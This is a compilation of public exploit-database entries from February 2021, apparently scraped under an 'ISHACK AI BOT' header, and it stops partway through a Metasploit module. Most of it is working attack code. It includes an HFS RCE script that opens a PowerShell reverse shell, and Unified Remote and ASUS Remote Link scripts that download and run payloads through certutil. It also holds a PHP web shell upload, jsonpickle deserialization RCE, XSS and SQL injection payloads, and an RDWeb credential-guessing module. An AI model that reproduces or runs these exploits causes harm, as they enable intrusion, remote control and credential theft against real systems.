ISHACK AI BOT

# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) # Google Dork: intext:"httpfileserver 2.3" # Date: 20/02/2021 # Exploit Author: Pergyz # Vendor Homepage: http://www.rejetto.com/hfs/ # Software Link: https://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Microsoft Windows Server 2012 R2 Standard # CVE : CVE-2014-6287 # Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands #!/usr/bin/python3 import base64 import os import urllib.request import urllib.parse lhost = "10.10.10.1" lport = 1111 rhost = "10.10.10.8" rport = 80 # Define the command to be written to a file command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()' # Encode the command in base64 format encoded_command = base64.b64encode(command.encode("utf-16le")).decode() print("\nEncoded the command in base64 format...") # Define the payload to be included in the URL payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}' # Encode the payload and send a HTTP GET request encoded_payload = urllib.parse.quote_plus(payload) url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}' urllib.request.urlopen(url) print("\nEncoded the payload and sent a HTTP GET request to the target...") # Print some information print("\nPrinting some information for debugging...") print("lhost: ", lhost) print("lport: ", lport) print("rhost: ", rhost) print("rport: ", rport) print("payload: ", payload) # Listen for connections print("\nListening for connection...") os.system(f'nc -nlvp {lport}')

# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS # Date: 22/02/2021 # Exploit Author: Tadjmen # Vendor Homepage: https://batflat.org/ # Software Link: https://github.com/sruupl/batflat/archive/master.zip # Version: 1.3.6 # Tested on: Xammpp on Windows, Firefox Newest # CVE : N/A Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 Login with editor account with rights to Navigation, Galleries, Snippets Navigation - Add link payload: "><img src=x onerror=alert(document.cookie)> Galleries - Add gallery payload: mlem"><svg/onload=alert(1)> Snippets - Add Snippets payload: mlem"><svg/onload=alert("TuongNC")> More information: https://github.com/sruupl/batflat/issues/105

# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution # Date: 24-2-2021 # Vendor Homepage: https://jsonpickle.github.io # Exploit Author: Adi Malyanker, Shay Reuven # Software Link: https://github.com/jsonpickle/jsonpickle # Version: 2.0.0 # Tested on: windows, linux # Python is an open source language. jsonickle module is provided to convert objects into a serialized form, # and later recover the data back into an object. the decode is used to undeserialize serialized strings. # If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls. # the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr". # The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet # the payload was found during our research made on deserialization functions. # the pattern should be : # {..{"py/repr":<the module to import>/<the command to be executed.>}..} # example: malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}' # the command on the server side some_parameter = jsonpickle.decode(malicious)

# Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path # Discovery by: Victor Mondragón # Discovery Date: 23-02-2021 # Vendor Homepage: https://www.softros.com/ # Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi # Tested Version: 8.1 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 7 Service Pack 1 x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ LogonExpert Service LogonExpertSvc C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe Auto C:\>sc qc LogonExpertSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: LogonExpertSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe LOAD_ORDER_GROUP : LogonExpertGroup TAG : 0 DISPLAY_NAME : LogonExpert Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution # Author: H4rk3nz0 # Vendor Homepage: https://www.unifiedremote.com/ # Software Link: https://www.unifiedremote.com/download # Tested on: Windows 10, 10.0.19042 Build 19042 #!/usr/bin/python import socket import sys import os from time import sleep target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port = 9512 # Packet Data Declarations; Windows, Space and Enter have non-standard values open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862" "2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400" "0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831" "000356657273696f6e000000000a00").decode("hex") open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7" "3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453" "796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646" "5643430373664653736366464363134343336313938303961643766333538353864343439320008526571" "75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000" ).decode("hex") one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024" "c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756" "5730002000556616c756500").decode("hex") two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007" "0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex") three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730" "386531346535323834636238310000").decode("hex") win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726" "400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065" "6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797" "0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055" "6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6" "9642d643730386531346535323834636238310000").decode("hex") ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172" "6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000" "656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000" "08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730" "002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365" "00616e64726f69642d643730386531346535323834636238310000").decode("hex") space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6" "1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617" "3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650" "00008547970650008000000085265717565737400070252756e0002457874726173000656616c756" "5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726" "36500616e64726f69642d643730386531346535323834636238310000").decode("hex") # ASCII to Hex Conversion Set characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", "+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} # User Specified arguments try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>") # Send Windows Key Input Twice def SendWin(): target.sendto(win_key,(rhost, port)) target.sendto(win_key,(rhost, port)) sleep(0.4) # Send Enter/Return Key Input def SendReturn(): target.sendto(ret_key,(rhost, port)) sleep(0.4) # Send String Characters def SendString(string, rhost): for char in string: if char == " ": target.sendto(space_key,(rhost, port)) sleep(0.02) else: convert = characters[char].decode("hex") target.sendto(one + convert + two + convert + three,(rhost, port)) sleep(0.02) # Main Execution def main(): target.connect((rhost,port)) sleep(0.5) print("[+] Connecting to target...") target.sendto(open,(rhost,port)) # Initialize Connection to Unified sleep(0.02) target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection print("[+] Popping Start Menu") sleep(0.02) SendWin() sleep(0.3) print("[+] Opening CMD") SendString("cmd.exe", rhost) sleep(0.3) SendReturn() sleep(0.3) print("[+] *Super Fast Hacker Typing*") SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload sleep(0.3) print("[+] Downloading Payload") SendReturn() sleep(3) SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload sleep(0.3) SendReturn() print("[+] Done! Check listener?") target.close() if __name__=="__main__": main()

# Exploit Title: SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) # Exploit Author : Sinem Şahin # Exploit Date: 2021-02-10 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe # Tested on: Windows 7 x64 # Version: 5.3.5 # Steps: 1- Run the python script. (exploit.py) 2- Open payload.txt and copy content to clipboard. 3- Run 'SpotAuditor 5.3.5'. 4- Register -> Enter Registration Code 5- Paste clipboard into the "Name" or "Key". 6- Click on OK. 7- Crashed. ---> exploit.py <-- #!/usr/bin/env python buffer = "\x41" * 300 try: f = open("payload.txt","w") f.write(buffer) f.close() print"File okey!!" except: print "File is not created."

# Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path # Discovery by: Victor Mondragón # Discovery Date: 23-02-2021 # Vendor Homepage: https://www.softros.com/ # Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe # Tested Version: 9.6.4 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ Softros Spell Checker SoftrosSpellChecker C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe Auto C:\>sc qc SoftrosSpellChecker [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SoftrosSpellChecker TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe GRUPO_ORDEN_CARGA : System Reserved ETIQUETA : 0 NOMBRE_MOSTRAR : Softros Spell Checker DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) # Exploit Author : Sinem Şahin # Exploit Date: 2021-02-23 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe # Version: 4.2.7 # Tested on: Windows 7 x64 # Steps: 1- Run the python script. (exploit.py) 2- Open payload.txt and copy content to clipboard. 3- Run 'Product Key Explorer 4.2.7'. 4- Register -> Enter Registration Code 5- Paste clipboard into the "Key" or "Name". 6- Click on OK. 7- Crashed. ---> exploit.py <-- #!/usr/bin/env python buffer = "\x41" * 300 try: f = open("payload.txt","w") f.write(buffer) f.close() print "File created!" except: print "File cannot be created!!"

# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection # Date: 2021-02-19 # Exploit Author: Görkem Haşin # Version: 1.1.4 # Tested on: Linux/Windows # POST /search.php HTTP/1.1 # Host: Target Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search

# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution # Date: 24-02-2021 # Exploit Author: H4rk3nz0 # Vendor Homepage: http://asus.com/ # Software Link: http://remotelink.asus.com/ # Version: 1.1.2.13 # Tested on: Windows 10 Enterprise Build 17763 # CVE: N/A #!/usr/bin/python import socket from time import sleep import sys port = 5665 target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) prefix = "04020b02" suffix = "0000020000000000000000000300000000000000000004000000000000000000010000" enter = (prefix + ("0" * 1038)).decode("hex") string_prefix = "04020b0200000000010000" string_suffix = "0" * 1022 pre_command = "04000b0200000000".decode("hex") user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender' # ASCII to Hex Character List characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} # User Specified arguments try: rhost = "192.168.1.93" lhost = sys.argv[2] payload = sys.argv[3] except: print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>") exit() # HandShake Packets to Smart Gesture Server def Handshake(): target.connect((rhost,port)) target.sendto("b2".decode("hex"),(rhost,port)) target.sendto("38323538".decode("hex"),(rhost,port)) target.sendto("03000f0000000000".decode("hex"),(rhost,port)) target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port)) target.sendto("02008a0000000000".decode("hex"),(rhost,port)) target.sendto(user_declare,(rhost,port)) sleep(0.1) def MoveMouse(): for i in range(0,16): target.sendto("0000330038040006".decode("hex"),(rhost,port)) target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port)) target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port)) sleep(0.6) # Sends Left Click Input (Occasional Delay for some Reason) def LeftClick(): target.sendto("0000330038040006".decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port)) sleep(4) # Send Enter/Return Key Input def SendReturn(): target.sendto(pre_command,(rhost,port)) sleep(0.2) target.sendto(enter,(rhost,port)) # Enter/Return Key # Send String Characters def SendString(string): for char in string: convert = characters[char] final_string = string_prefix + convert + string_suffix target.sendto(pre_command,(rhost,port)) target.sendto(final_string.decode("hex"),(rhost,port)) sleep(0.2) # Main Execution def main(): print("[+] Saying Hello") Handshake() sleep(2) print("[+] Moving Mouse") MoveMouse() print("[+] Left Clicking (takes a few seconds)") LeftClick() # Left Click is delayed sometimes print("[+] Opening CMD") SendString("cmd.exe") # Start Command Prompt sleep(0.5) SendReturn() sleep(1) print("[+] Retrieving Payload") SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload sleep(0.5) SendReturn() sleep(3) print("[+] Executing") SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload sleep(0.5) SendReturn() sleep(0.5) print("[+] Done! Check your listener?") SendReturn() # Trailing Enter Command Ensures full execution target.close() exit() if __name__=="__main__": main()

# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS) # Date: 2021-02-25 # Exploit Author: Tushar Vaidya # Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip # Version: v1.0 # Tested on: Ubuntu *Steps to Reproduce:* 1) Login with Admin Credentials and click on the '*Manage category*' button. 2) Click on the '*Add Categories*' button. 3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite. 4) Now add the following payload input field of *Category *as a parameter name is *catename* Payload: ba1man"><script>alert(document.cookie)</script> 4) Click On Save 5) Now go to '*Manage category > View Categories*' 5) XSS payload is triggered. *proof-of-concept:* 1) Request: POST /lagos_parker/parker/addcategory.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lagos_parker/parker/addcategory.php Content-Type: application/x-www-form-urlencoded Content-Length: 82 Connection: close Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn Upgrade-Insecure-Requests: 1 catename=ba1man"><script>alert(document.cookie)</script>&submit=

# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated) # Date: 2021-02-25 # Exploit Author: [email protected] # Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip # Version: v1.0 # Tested on: Ubuntu 20.04.2 uploadID.php can be used to upload .php files to '/uploads/employees_ids/' without authentication. POC --- 1) Make the following Request changing the "Host:" to your Victim IP. POST /dashboard/uploadID.php HTTP/1.1 Host: 192.168.1.117 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 Content-Length: 267 DNT: 1 Connection: close -----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php" Content-Type: image/png <?php $cmd=$_GET['cmd']; system($cmd); ?> -----------------------------5825462663702204104870787337-- 2) You will get the response with the name of the uploaded file (upload_filename). HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Feb 2021 19:17:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 77 {"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"} 3) Your file will be located in: http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php 4) In this example, to run commands: http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami

# Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS # Date: 25/02/2021 # Exploit Author: Peithon # Vendor Homepage: https://github.com/eddy8/LightCMS # Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4 # Version: 1.3.4 # Tested on: latest version of Chrome, Firefox on Windows and Linux # CVE: CVE-2021-3355 An issue was discovered in LightCMS v1.3.4.(https://github.com/eddy8/LightCMS/issues/18) There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords. --------------------------Proof of Concept----------------------- 1. Log in to the background. 2. Navigate to System -> `/admin/SensitiveWords/create` & add the below-shared payload as the exclusive field value. Payload - </span><img src=1 onerror=alert(1) /><span> 3. Visit page `/admin/SensitiveWords`, the payload will be triggered.

# Exploit Title: Triconsole 3.75 - Reflected XSS # Google Dork: inurl : /calendar/calendar_form.php # Date: 15/2/2021 # Exploit Author: Akash Chathoth # Vendor Homepage: http://www.triconsole.com/ # Software Link: http://www.triconsole.com/php/calendar_datepicker.php # Version: < 3.76 (14 February 2021) # Tested on: 3.75 # CVE: 2021-27330 # Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>

#!/usr/bin/env python3 # -*- coding: utf-8 -*- # standard modules from metasploit import module # extra modules DEPENDENCIES_MISSING = False try: import base64 import itertools import os import requests except ImportError: DEPENDENCIES_MISSING = True # Metasploit Metadata metadata = { 'name': 'Microsoft RDP Web Client Login Enumeration', 'description': ''' Enumerate valid usernames and passwords against a Microsoft RDP Web Client by attempting authentication and performing a timing based check against the provided username. ''', 'authors': [ 'Matthew Dunn' ], 'date': '2020-12-23', 'license': 'MSF_LICENSE', 'references': [ {'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'}, ], 'type': 'single_scanner', 'options': { 'targeturi': {'type': 'string', 'description': 'The base path to the RDP Web Client install', 'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'}, 'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': 443}, 'domain': {'type': 'string', 'description': 'The target AD domain', 'required': False, 'default': None}, 'username': {'type': 'string', 'description': 'The username to verify or path to a file of usernames', 'required': True, 'default': None}, 'password': {'type': 'string', 'description': 'The password to try or path to a file of passwords', 'required': False, 'default': None}, 'timeout': {'type': 'int', 'description': 'Response timeout in milliseconds to consider username invalid', 'required': True, 'default': 1250}, 'enum_domain': {'type': 'bool', 'description': 'Automatically enumerate AD domain using NTLM', 'required': False, 'default': True}, 'verify_service': {'type': 'bool', 'description': 'Verify the service is up before performing login scan', 'required': False, 'default': True}, 'user_agent': {'type': 'string', 'description': 'User Agent string to use, defaults to Firefox', 'required': False, 'default': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} } } def verify_service(rhost, rport, targeturi, timeout, user_agent): """Verify the service is up at the target URI within the specified timeout""" url = f'https://{rhost}:{rport}/{targeturi}' headers = {'Host':rhost, 'User-Agent': user_agent} try: request = requests.get(url, headers=headers, timeout=(timeout / 1000), verify=False, allow_redirects=False) return request.status_code == 200 and 'RDWeb' in request.text except requests.exceptions.Timeout: return False except Exception as exc: module.log(str(exc), level='error') return False def get_ad_domain(rhost, rport, user_agent): """Retrieve the NTLM domain out of a specific challenge/response""" domain_urls = ['aspnet_client', 'Autodiscover', 'ecp', 'EWS', 'OAB', 'Microsoft-Server-ActiveSync', 'PowerShell', 'rpc'] headers = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==', 'User-Agent': user_agent, 'Host': rhost} session = requests.Session() for url in domain_urls: target_url = f"https://{rhost}:{rport}/{url}" request = session.get(target_url, headers=headers, verify=False) # Decode the provided NTLM Response to strip out the domain name if request.status_code == 401 and 'WWW-Authenticate' in request.headers and \ 'NTLM' in request.headers['WWW-Authenticate']: domain_hash = request.headers['WWW-Authenticate'].split('NTLM ')[1].split(',')[0] domain = base64.b64decode(bytes(domain_hash, 'utf-8')).replace(b'\x00',b'').split(b'\n')[1] domain = domain[domain.index(b'\x0f') + 1:domain.index(b'\x02')].decode('utf-8') module.log(f'Found Domain: {domain}', level='good') return domain module.log('Failed to find Domain', level='error') return None def check_login(rhost, rport, targeturi, domain, username, password, timeout, user_agent): """Check a single login against the RDWeb Client The timeout is used to specify the amount of milliseconds where a response should consider the username invalid.""" url = f'https://{rhost}:{rport}/{targeturi}' body = f'DomainUserName={domain}%5C{username}&UserPass={password}' headers = {'Host':rhost, 'User-Agent': user_agent, 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': f'{len(body)}', 'Origin': f'https://{rhost}'} session = requests.Session() report_data = {'domain':domain, 'address': rhost, 'port': rport, 'protocol': 'tcp', 'service_name':'RDWeb'} try: request = session.post(url, data=body, headers=headers, timeout=(timeout / 1000), verify=False, allow_redirects=False) if request.status_code == 302: module.log(f'Login {domain}\\{username}:{password} is valid!', level='good') module.report_correct_password(username, password, **report_data) elif request.status_code == 200: module.log(f'Password {password} is invalid but {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds', level='good') module.report_valid_username(username, **report_data) else: module.log(f'Received unknown response with status code: {request.status_code}') except requests.exceptions.Timeout: module.log(f'Login {domain}\\{username}:{password} is invalid! No response received in {timeout} milliseconds', level='error') except requests.exceptions.RequestException as exc: module.log('{}'.format(exc), level='error') return def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout, user_agent): """Check each username and password combination""" for (username, password) in list(itertools.product(usernames, passwords)): check_login(rhost, rport, targeturi, domain, username.strip(), password.strip(), timeout, user_agent) def run(args): """Run the module, gathering the domain if desired and verifying usernames and passwords""" module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOSTS'])) if DEPENDENCIES_MISSING: module.log('Module dependencies are missing, cannot continue', level='error') return user_agent = args['user_agent'] # Verify the service is up if requested if args['verify_service']: service_verified = verify_service(args['RHOSTS'], args['rport'], args['targeturi'], int(args['timeout']), user_agent) if service_verified: module.log('Service is up, beginning scan...', level='good') else: module.log(f'Service appears to be down, no response in {args["timeout"]} milliseconds', level='error') return # Gather AD Domain either from args or enumeration domain = args['domain'] if 'domain' in args else None if not domain and args['enum_domain']: domain = get_ad_domain(args['RHOSTS'], args['rport'], user_agent) # Verify we have a proper domain if not domain: module.log('Either domain or enum_domain must be set to continue, aborting...', level='error') return # Gather usernames and passwords for enumeration if os.path.isfile(args['username']): with open(args['username'], 'r') as file_contents: usernames = file_contents.readlines() else: usernames = [args['username']] if 'password' in args and os.path.isfile(args['password']): with open(args['password'], 'r') as file_contents: passwords = file_contents.readlines() 